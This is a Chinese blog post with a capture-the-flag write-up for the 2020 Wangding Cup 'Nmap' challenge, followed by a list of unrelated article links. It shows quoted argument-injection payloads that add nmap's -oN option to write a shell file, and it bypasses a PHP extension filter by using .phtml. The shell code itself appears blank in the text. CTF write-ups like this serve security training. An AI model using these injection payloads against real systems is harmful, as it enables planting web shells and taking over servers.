博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
[网鼎杯 2020 朱雀组]Nmap
阅读量:4027 次
发布时间:2019-05-24

本文共 229 字,大约阅读时间需要 1 分钟。

[网鼎杯 2020 朱雀组]Nmap

nmap

在这里插入图片描述

本题的考点是利用nmap的-oN写shell。

nmap -oN xxx.txt

先构造:

' -oN w4ke.txt '

返回了Host maybe down,然后访问一下w4ke.txt

在这里插入图片描述
构造:

' -oN w4ke.php 
'

返回了Hacker...

fuzz了一下,发现了php被过滤,phtml可以用。

于是构造:

'  -oN w4ke.phtml 
'

在这里插入图片描述

cat flag 即可

转载地址:http://tapbi.baihongyu.com/

你可能感兴趣的文章
用Spring更好地处理Struts动作三种整合
查看>>
spring中配置二级缓存
查看>>
Hibernate 查询语句HQL基本语法
查看>>
HIbernate查询
查看>>
小技巧要你命三千之:checkbox radio select 只读效果
查看>>
Android开发(一)Android搭建、HelloWorld
查看>>
Android开发(一)拨打电话程序
查看>>
Android开发(一)发送短信程序
查看>>
Android(二)数据存储和访问 之文件
查看>>
Android(三)数据存储之XML解析技术
查看>>
Android(三) 数据存储之二 SharedPreferences
查看>>
Android(三)数据存储之三SQLite嵌入式数据库
查看>>
Android(四)数据存储之四ContentProvider
查看>>
Android(四)数据存储之四网络
查看>>
Android(五)数据存储之五网络数据交互
查看>>
Android(五)数据存储之五网络多线程断点下载
查看>>
Android(六)Activity、请求码与结果码、Intent、广播、服务
查看>>
Android(六)通知、样式、主题、HTML
查看>>
浅谈 Facade 模式
查看>>
单例模式中,懒汉式和饿汉式的区别
查看>>